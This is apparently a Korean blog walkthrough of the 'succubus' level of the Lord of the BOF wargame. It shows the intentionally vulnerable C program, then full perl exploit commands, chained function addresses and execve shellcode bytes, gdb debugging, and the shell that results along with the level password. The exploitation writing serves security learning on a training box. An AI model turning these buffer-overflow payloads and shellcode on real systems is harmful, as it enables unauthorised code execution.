zombie_assasin to succubus

소스를 보자.

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c

The Lord of the BOF : The Fellowship of the BOF

- succubus

- calling functions continuously

#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h> // dumpcode가 추가되어 있음

// the inspector //검사자

int check = 0;

void MO(char *cmd)

{

if(check != 4)

exit(0);

printf("welcome to the MO!\n");

// olleh!

system(cmd);

}

void YUT(void)

{

if(check != 3)

exit(0);

printf("welcome to the YUT!\n");

check = 4;

}

void GUL(void)

{

if(check != 2)

exit(0);

printf("welcome to the GUL!\n");

check = 3;

}

void GYE(void)

{

if(check != 1)

exit(0);

printf("welcome to the GYE!\n");

check = 2;

}

void DO(void)

{

printf("welcome to the DO!\n");

check = 1;

}

main(int argc, char *argv[])

{

char buffer[40];

char *addr;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// you cannot use library

if(strchr(argv[1], '\x40')){ //argv[1]중 \x40이 있으면 종료 -> RTL 사용안됨, RTL기법을 이용한 shellcode도 사용안됨

printf("You cannot use library\n");

exit(0);

}

// check address

addr = (char *)&DO; //DO함수의 주소를 addr에 옮김

if(memcmp(argv[1]+44, &addr, 4) != 0){ //ret에 들어있는 주소랑 DO의 주소랑 같은지 비교함

printf("You must fall in love with DO\n"); //같지 않을시 종료

exit(0);

}

// overflow!

strcpy(buffer, argv[1]); //vuln!

printf("%s\n", buffer);

// stack destroyer

// 100 : extra space for copied argv[1]

memset(buffer, 0, 44); //buffer+sfp 를 0으로 초기화

memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100)); //buffer + 148 주소 부터 그위의 모든 스택영역을 0으로 초기화

// LD_* eraser

// 40 : extra space for memset function

memset(buffer-3000, 0, 3000-40); //공유 라이브러리 초기화

}

이번 문제는 일단

1.ret에 DO함수가 와야한다.

2.argv[1]에 \x40불가, library불가능

2.ret이후의 100byte사용가능

3.공유라이브러리 사용불가

4.MO함수의 system(cmd)

의 4가지 조건이 보인다.

이것으로 공격 방법을 추측 해 보자면,

일단 DO함수를 불러온다음 차례로 GYE, GUL, YUT, MO 를 불러와 MO 함수에 인자로 /bin/sh를 주는 방법과,

DO함수를 불러온다음 DO함수의 RET에 shellcode(\x40이 없는)의 주소를 주는 2가지 방법으로 풀 수 있겟다.

1번방법

payload

[x*44][&DO][&GYE][&GUL][&YUT][&MO][aaaa][&"/bin/sh"]["/bin/sh"]

공격!

[zombie_assassin@localhost zombie_assassin]$ cat succubus_1.c

The Lord of the BOF : The Fellowship of the BOF

- succubus

- calling functions continuously

#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>

// the inspector

int check = 0;

void MO(char *cmd)

{

if(check != 4)

exit(0);

printf("welcome to the MO!\n");

// olleh!

system(cmd);

dumpcode((char*)cmd,64); //cmd에 /bin/sh의 주소가 잘 드갓나 확인하기 위해 dumpcode를 넣어서 다시 컴파일 하였다

}

void YUT(void)

{

if(check != 3)

exit(0);

printf("welcome to the YUT!\n");

check = 4;

}

void GUL(void)

{

if(check != 2)

exit(0);

printf("welcome to the GUL!\n");

check = 3;

}

void GYE(void)

{

if(check != 1)

exit(0);

printf("welcome to the GYE!\n");

check = 2;

}

void DO(void)

{

printf("welcome to the DO!\n");

check = 1;

}

main(int argc, char *argv[])

{

char buffer[40];

char *addr;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// you cannot use library

if(strchr(argv[1], '\x40')){

printf("You cannot use library\n");

exit(0);

}

// check address

addr = (char *)&DO;

if(memcmp(argv[1]+44, &addr, 4) != 0){

printf("You must fall in love with DO\n");

exit(0);

}

// overflow!

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// stack destroyer

// 100 : extra space for copied argv[1]

memset(buffer, 0, 44);

memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

// LD_* eraser

// 40 : extra space for memset function

memset(buffer-3000, 0, 3000-40);

}

[zombie_assassin@localhost zombie_assassin]$ bash2 //bash2쉘을 켜주고(/bin/sh의 주소에 \xff가 들어가 있어서)

[zombie_assassin@localhost zombie_assassin]$ ./succubus_2 `perl -e 'print "x"x44,"\xfc\x87\x04\x08","\xcc\x87\x04\x08","\x9c\x87\x04\x08","\x6c\x87\x

04\x08","\x34\x87\x04\x08","aaaa","\x68\xfc\xff\xbf","/bin/sh"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx??쐡l?4?aaaah??bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

Illegal instruction (core dumped) //core dump가 생겻다.

[zombie_assassin@localhost zombie_assassin]$ gdb -q succubus_2 core //core파일을 이용해 디버깅 해보자

Core was generated by ` '.

Program terminated with signal 4, Illegal instruction.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0x8048735 in MO ()

(gdb) x/12x $esp

0xbffffc60: 0x61616161 0xbffffc68 0x6e69622f 0x0068732f //주소가 제대로 드간것을 확인할수 있다.

0xbffffc70: 0x08048818 0x00000002 0xbffffc94 0x0804839c //segment fualt가 발생하는 이유는 알수 없다. MO함수의 exit 쪽 주소에서 발생..

0xbffffc80: 0x0804895c 0x4000ae60 0xbffffc8c 0x40013e90

(gdb) quit

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04

\x08","\x24\x87\x04\x08","aaaa","\x68\xfc\xff\xbf","/bin/sh"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?펶뙁\?$?aaaah??bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ id

uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zombie_assassin)

bash$ my-pass

euid = 517

here to stay

2번째 공격

payload

[x*44][&DO][&shellcode][shellcode]

공격!

[zombie_assassin@localhost zombie_assassin]$ ./succubus_2 `perl -e 'print "x"x44,"\xfc\x87\x04\x08","\x68\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\

x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?h??픐h//shh/bin됥PS됣1柰

welcome to the DO!

Segmentation fault (core dumped) //core dump생성

[zombie_assassin@localhost zombie_assassin]$ gdb -q succubus_2 core

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbffffc68 in ?? () //segment fault가 우리가 쉘코드의 위치로 준 지점에서 난 것을 알 수 있음, 쉘코드 위치가 잘못됨.,

(gdb) x/12x $esp

0xbffffc54: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e //쉘코드 시작위치 확인

0xbffffc64: 0x31e18953 0xcd0bb0d2 0x08040080 0x08048818

0xbffffc74: 0x00000002 0xbffffc94 0x0804839c 0x0804895c

(gdb) quit

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x54\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?T??픐h//shh/bin됥PS됣1柰

welcome to the DO!

Segmentation fault //쉘코드 위치를 고치고 공격해봣지만 먹히지 안음

[zombie_assassin@localhost zombie_assassin]$ ./succubus_2 `perl -e 'print "x"x44,"\xfc\x87\x04\x08","\x54\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\

x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?T??픐h//shh/bin됥PS됣1柰

welcome to the DO!

bash$ quit

sh: quit: command not found

bash$ exit //succubus_2는 잘됨...

exit

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x54\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?T??픐h//shh/bin됥PS됣1柰

welcome to the DO!

Segmentation fault

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x50\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?P??픐h//shh/bin됥PS됣1柰

welcome to the DO!

Illegal instruction

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x58\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?X??픐h//shh/bin됥PS됣1柰

welcome to the DO!

Segmentation fault

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x5c\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?\??픐h//shh/bin됥PS됣1柰

welcome to the DO!

Segmentation fault

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x64\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?d??픐h//shh/bin됥PS됣1柰

welcome to the DO!

bash$ id

uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zombie_assassin)

bash$ my-pass

euid = 517

here to stay

'wargame > LOB Redhat' 카테고리의 다른 글

nightmare to xavius (0)	2014.05.27
succubus to nightmare (0)	2014.05.27
assassin to zombie_assassin (0)	2014.05.27
giant to assasin (0)	2014.05.27
bugbear to giant (0)	2014.05.27

Sanguine

zombie_assasin to succubus

'wargame > LOB Redhat' 카테고리의 다른 글

티스토리툴바

zombie_assasin to succubus

'wargame > LOB Redhat' 카테고리의 다른 글

'wargame/LOB Redhat' Related Articles

티스토리툴바